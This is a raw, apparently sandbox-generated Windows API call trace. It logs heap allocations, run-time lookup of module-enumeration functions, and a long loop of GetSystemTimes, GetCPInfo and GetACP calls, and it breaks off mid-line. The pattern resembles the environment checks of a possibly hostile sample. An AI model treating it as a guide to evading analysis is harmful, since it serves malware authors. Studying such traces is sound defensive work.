GetLastError () returned 0x0 [0082.920] SetLastError (dwErrCode=0x0) [0082.921] GetLastError () returned 0x0 [0082.921] SetLastError (dwErrCode=0x0) [0082.921] GetLastError () returned 0x0 [0082.921] SetLastError (dwErrCode=0x0) [0082.921] GetLastError () returned 0x0 [0082.921] SetLastError (dwErrCode=0x0) [0082.921] GetLastError () returned 0x0 [0082.921] SetLastError (dwErrCode=0x0) [0082.921] GetLastError () returned 0x0 [0082.921] SetLastError (dwErrCode=0x0) [0082.921] GetLastError () returned 0x0 [0082.921] SetLastError (dwErrCode=0x0) [0082.921] GetLastError () returned 0x0 [0082.922] SetLastError (dwErrCode=0x0) [0082.922] GetLastError () returned 0x0 [0083.007] SetLastError (dwErrCode=0x0) [0083.007] GetLastError () returned 0x0 [0083.008] SetLastError (dwErrCode=0x0) [0083.008] GetLastError () returned 0x0 [0083.008] SetLastError (dwErrCode=0x0) [0083.008] GetLastError () returned 0x0 [0083.008] SetLastError (dwErrCode=0x0) [0083.008] GetLastError () returned 0x0 [0083.008] SetLastError (dwErrCode=0x0) [0083.008] GetLastError () returned 0x0 [0083.008] SetLastError (dwErrCode=0x0) [0083.008] GetLastError () returned 0x0 [0083.009] SetLastError (dwErrCode=0x0) [0083.009] GetLastError () returned 0x0 [0083.009] SetLastError (dwErrCode=0x0) [0083.009] GetLastError () returned 0x0 [0083.009] SetLastError (dwErrCode=0x0) [0083.009] GetLastError () returned 0x0 [0083.009] SetLastError (dwErrCode=0x0) [0083.009] GetLastError () returned 0x0 [0083.010] SetLastError (dwErrCode=0x0) [0083.010] GetLastError () returned 0x0 [0083.010] SetLastError (dwErrCode=0x0) [0083.010] GetLastError () returned 0x0 [0083.010] SetLastError (dwErrCode=0x0) [0083.010] GetLastError () returned 0x0 [0083.010] SetLastError (dwErrCode=0x0) [0083.010] GetLastError () returned 0x0 [0083.010] SetLastError (dwErrCode=0x0) [0083.010] GetLastError () returned 0x0 [0083.011] SetLastError (dwErrCode=0x0) [0083.011] GetLastError () returned 0x0 [0083.011] SetLastError (dwErrCode=0x0) [0083.011] GetLastError () returned 0x0 [0083.011] SetLastError (dwErrCode=0x0) [0083.011] GetLastError () returned 0x0 [0083.011] SetLastError (dwErrCode=0x0) [0083.011] GetLastError () returned 0x0 [0083.012] SetLastError (dwErrCode=0x0) [0083.012] GetLastError () returned 0x0 [0083.012] SetLastError (dwErrCode=0x0) [0083.012] GetLastError () returned 0x0 [0083.012] SetLastError (dwErrCode=0x0) [0083.012] RtlAllocateHeap (HeapHandle=0x1f80000, Flags=0x8, Size=0x98) returned 0x1f81a10 [0083.012] RtlAllocateHeap (HeapHandle=0x1f80000, Flags=0x8, Size=0x1f) returned 0x1f81ab0 [0083.012] RtlAllocateHeap (HeapHandle=0x1f80000, Flags=0x8, Size=0x36) returned 0x1f81ad8 [0083.012] RtlAllocateHeap (HeapHandle=0x1f80000, Flags=0x8, Size=0x37) returned 0x1f81b18 [0083.012] RtlAllocateHeap (HeapHandle=0x1f80000, Flags=0x8, Size=0x3c) returned 0x1f81b58 [0083.013] RtlAllocateHeap (HeapHandle=0x1f80000, Flags=0x8, Size=0x31) returned 0x1f81ba0 [0083.013] RtlAllocateHeap (HeapHandle=0x1f80000, Flags=0x8, Size=0x17) returned 0x1f81be0 [0083.013] RtlAllocateHeap (HeapHandle=0x1f80000, Flags=0x8, Size=0x24) returned 0x1f81c00 [0083.013] RtlAllocateHeap (HeapHandle=0x1f80000, Flags=0x8, Size=0x14) returned 0x1f81c30 [0083.013] RtlAllocateHeap (HeapHandle=0x1f80000, Flags=0x8, Size=0xd) returned 0x1f81c50 [0083.013] RtlAllocateHeap (HeapHandle=0x1f80000, Flags=0x8, Size=0x25) returned 0x1f81c68 [0083.013] RtlAllocateHeap (HeapHandle=0x1f80000, Flags=0x8, Size=0x39) returned 0x1f81c98 [0083.013] RtlAllocateHeap (HeapHandle=0x1f80000, Flags=0x8, Size=0x18) returned 0x1f81ce0 [0083.013] RtlAllocateHeap (HeapHandle=0x1f80000, Flags=0x8, Size=0x17) returned 0x1f81d00 [0083.013] RtlAllocateHeap (HeapHandle=0x1f80000, Flags=0x8, Size=0xe) returned 0x1f81d20 [0083.013] RtlAllocateHeap (HeapHandle=0x1f80000, Flags=0x8, Size=0x69) returned 0x1f81d38 [0083.013] RtlAllocateHeap (HeapHandle=0x1f80000, Flags=0x8, Size=0x3e) returned 0x1f81db0 [0083.013] RtlAllocateHeap (HeapHandle=0x1f80000, Flags=0x8, Size=0x1b) returned 0x1f81df8 [0083.013] RtlAllocateHeap (HeapHandle=0x1f80000, Flags=0x8, Size=0x1d) returned 0x1f81e20 [0083.014] RtlAllocateHeap (HeapHandle=0x1f80000, Flags=0x8, Size=0x48) returned 0x1f81e48 [0083.014] RtlAllocateHeap (HeapHandle=0x1f80000, Flags=0x8, Size=0x12) returned 0x1f81e98 [0083.014] RtlAllocateHeap (HeapHandle=0x1f80000, Flags=0x8, Size=0x18) returned 0x1f81eb8 [0083.014] RtlAllocateHeap (HeapHandle=0x1f80000, Flags=0x8, Size=0x1b) returned 0x1f81ed8 [0083.014] RtlAllocateHeap (HeapHandle=0x1f80000, Flags=0x8, Size=0x24) returned 0x1f81f00 [0083.014] RtlAllocateHeap (HeapHandle=0x1f80000, Flags=0x8, Size=0x29) returned 0x1f81f30 [0083.014] RtlAllocateHeap (HeapHandle=0x1f80000, Flags=0x8, Size=0x1e) returned 0x1f81f68 [0083.014] RtlAllocateHeap (HeapHandle=0x1f80000, Flags=0x8, Size=0x41) returned 0x1f81f90 [0083.014] RtlAllocateHeap (HeapHandle=0x1f80000, Flags=0x8, Size=0x17) returned 0x1f81fe8 [0083.014] RtlAllocateHeap (HeapHandle=0x1f80000, Flags=0x8, Size=0xf) returned 0x1f82008 [0083.015] RtlAllocateHeap (HeapHandle=0x1f80000, Flags=0x8, Size=0x16) returned 0x1f82020 [0083.015] RtlAllocateHeap (HeapHandle=0x1f80000, Flags=0x8, Size=0x2a) returned 0x1f82040 [0083.015] RtlAllocateHeap (HeapHandle=0x1f80000, Flags=0x8, Size=0x29) returned 0x1f82078 [0083.015] RtlAllocateHeap (HeapHandle=0x1f80000, Flags=0x8, Size=0x15) returned 0x1f820b0 [0083.015] RtlAllocateHeap (HeapHandle=0x1f80000, Flags=0x8, Size=0x1e) returned 0x1f820d0 [0083.015] RtlAllocateHeap (HeapHandle=0x1f80000, Flags=0x8, Size=0x2a) returned 0x1f820f8 [0083.015] RtlAllocateHeap (HeapHandle=0x1f80000, Flags=0x8, Size=0x12) returned 0x1f82130 [0083.015] RtlAllocateHeap (HeapHandle=0x1f80000, Flags=0x8, Size=0x18) returned 0x1f82150 [0083.015] RtlAllocateHeap (HeapHandle=0x1f80000, Flags=0x8, Size=0x46) returned 0x1f82170 [0083.015] HeapFree (in: hHeap=0x1f80000, dwFlags=0x0, lpMem=0x1f811f8 | out: hHeap=0x1f80000) returned 1 [0083.018] RtlAllocateHeap (HeapHandle=0x1f80000, Flags=0x8, Size=0x800) returned 0x1f821c0 [0083.018] RtlAllocateHeap (HeapHandle=0x1f80000, Flags=0x8, Size=0x80) returned 0x1f811f8 [0083.018] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x404e59) returned 0x0 [0083.019] RtlSizeHeap (HeapHandle=0x1f80000, Flags=0x0, MemoryPointer=0x1f811f8) returned 0x80 [0083.019] GetLastError () returned 0x0 [0083.019] SetLastError (dwErrCode=0x0) [0083.019] GetLastError () returned 0x0 [0083.020] SetLastError (dwErrCode=0x0) [0083.020] GetLastError () returned 0x0 [0083.020] SetLastError (dwErrCode=0x0) [0083.020] GetLastError () returned 0x0 [0083.020] SetLastError (dwErrCode=0x0) [0083.020] GetLastError () returned 0x0 [0083.020] SetLastError (dwErrCode=0x0) [0083.020] GetLastError () returned 0x0 [0083.020] SetLastError (dwErrCode=0x0) [0083.020] GetLastError () returned 0x0 [0083.020] SetLastError (dwErrCode=0x0) [0083.021] GetLastError () returned 0x0 [0083.021] SetLastError (dwErrCode=0x0) [0083.021] GetLastError () returned 0x0 [0083.021] SetLastError (dwErrCode=0x0) [0083.021] GetLastError () returned 0x0 [0083.021] SetLastError (dwErrCode=0x0) [0083.021] GetLastError () returned 0x0 [0083.021] SetLastError (dwErrCode=0x0) [0083.021] GetLastError () returned 0x0 [0083.021] SetLastError (dwErrCode=0x0) [0083.021] GetLastError () returned 0x0 [0083.021] SetLastError (dwErrCode=0x0) [0083.021] GetLastError () returned 0x0 [0083.021] SetLastError (dwErrCode=0x0) [0083.022] GetLastError () returned 0x0 [0083.022] SetLastError (dwErrCode=0x0) [0083.022] GetLastError () returned 0x0 [0083.022] SetLastError (dwErrCode=0x0) [0083.022] GetLastError () returned 0x0 [0083.022] SetLastError (dwErrCode=0x0) [0083.022] GetLastError () returned 0x0 [0083.022] SetLastError (dwErrCode=0x0) [0083.022] GetLastError () returned 0x0 [0083.022] SetLastError (dwErrCode=0x0) [0083.022] GetLastError () returned 0x0 [0083.022] SetLastError (dwErrCode=0x0) [0083.022] GetLastError () returned 0x0 [0083.022] SetLastError (dwErrCode=0x0) [0083.022] GetLastError () returned 0x0 [0083.023] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76e10000 [0083.023] GetProcAddress (hModule=0x76e10000, lpProcName="CreateToolhelp32Snapshot") returned 0x76e4735f [0083.023] GetProcAddress (hModule=0x76e10000, lpProcName="Module32FirstW") returned 0x76e479f9 [0083.023] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x0) returned 0x78 [0083.026] Module32FirstW (hSnapshot=0x78, lpme=0x18fac8) returned 0 [0083.027] PeekMessageA (in: lpMsg=0x18fa24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x18fa24) returned 0 [0083.027] GetTickCount () returned 0x115a880 [0083.027] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.027] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.027] GetACP () returned 0x4e4 [0083.027] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.027] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.027] GetACP () returned 0x4e4 [0083.027] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.027] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.028] GetACP () returned 0x4e4 [0083.028] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.028] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.028] GetACP () returned 0x4e4 [0083.028] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.028] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.028] GetACP () returned 0x4e4 [0083.028] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.028] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.028] GetACP () returned 0x4e4 [0083.028] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.028] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.028] GetACP () returned 0x4e4 [0083.028] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.028] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.028] GetACP () returned 0x4e4 [0083.028] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.028] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.028] GetACP () returned 0x4e4 [0083.028] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.029] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.029] GetACP () returned 0x4e4 [0083.029] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.029] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.029] GetACP () returned 0x4e4 [0083.029] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.029] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.029] GetACP () returned 0x4e4 [0083.029] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.029] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.029] GetACP () returned 0x4e4 [0083.029] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.029] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.029] GetACP () returned 0x4e4 [0083.029] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.029] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.029] GetACP () returned 0x4e4 [0083.029] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.030] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.030] GetACP () returned 0x4e4 [0083.030] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.030] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.030] GetACP () returned 0x4e4 [0083.030] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.030] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.030] GetACP () returned 0x4e4 [0083.030] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.030] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.030] GetACP () returned 0x4e4 [0083.030] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.030] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.030] GetACP () returned 0x4e4 [0083.030] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.030] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.030] GetACP () returned 0x4e4 [0083.030] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.031] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.031] GetACP () returned 0x4e4 [0083.031] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.031] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.031] GetACP () returned 0x4e4 [0083.031] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.031] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.031] GetACP () returned 0x4e4 [0083.031] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.031] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.031] GetACP () returned 0x4e4 [0083.031] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.031] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.031] GetACP () returned 0x4e4 [0083.031] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.031] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.031] GetACP () returned 0x4e4 [0083.031] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.031] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.031] GetACP () returned 0x4e4 [0083.032] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.032] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.032] GetACP () returned 0x4e4 [0083.032] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.032] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.032] GetACP () returned 0x4e4 [0083.032] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.032] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.032] GetACP () returned 0x4e4 [0083.032] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.032] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.032] GetACP () returned 0x4e4 [0083.032] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.032] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.032] GetACP () returned 0x4e4 [0083.032] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.033] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.033] GetACP () returned 0x4e4 [0083.033] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.033] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.033] GetACP () returned 0x4e4 [0083.033] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.033] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.033] GetACP () returned 0x4e4 [0083.033] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.033] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.033] GetACP () returned 0x4e4 [0083.033] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.033] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.033] GetACP () returned 0x4e4 [0083.033] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.033] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.033] GetACP () returned 0x4e4 [0083.033] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.034] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.034] GetACP () returned 0x4e4 [0083.034] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.034] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.034] GetACP () returned 0x4e4 [0083.034] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.034] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.034] GetACP () returned 0x4e4 [0083.034] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.034] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.034] GetACP () returned 0x4e4 [0083.034] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.034] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.034] GetACP () returned 0x4e4 [0083.034] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.034] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.034] GetACP () returned 0x4e4 [0083.034] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.034] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.034] GetACP () returned 0x4e4 [0083.034] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.035] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.035] GetACP () returned 0x4e4 [0083.035] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.035] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.035] GetACP () returned 0x4e4 [0083.035] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.035] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.035] GetACP () returned 0x4e4 [0083.035] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.035] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.035] GetACP () returned 0x4e4 [0083.035] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.035] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.035] GetACP () returned 0x4e4 [0083.035] GetSystemTimes (in: 